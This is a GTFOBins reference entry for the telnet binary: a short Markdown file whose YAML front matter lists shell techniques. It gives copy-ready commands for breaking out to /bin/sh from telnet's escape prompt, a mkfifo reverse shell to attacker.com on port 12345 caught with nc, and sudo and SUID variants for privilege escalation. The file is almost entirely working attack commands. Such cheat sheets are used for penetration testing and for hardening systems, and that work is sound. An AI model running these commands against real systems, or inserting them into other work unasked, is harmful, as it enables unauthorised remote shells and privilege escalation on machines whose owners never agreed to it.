GTFOBins.github.io/_gtfobins/telnet.md
2018-07-31 12:44:16 +02:00

35 lines
894 B
Markdown

---
functions:
execute-interactive:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
RPORT=12345
telnet $RHOST $RPORT
^]
!/bin/sh
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
TF=$(mktemp -u)
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
sudo-enabled:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
RPORT=12345
sudo telnet $RHOST $RPORT
^]
!/bin/sh
suid-limited:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
RPORT=12345
./telnet $RHOST $RPORT
^]
!/bin/sh
---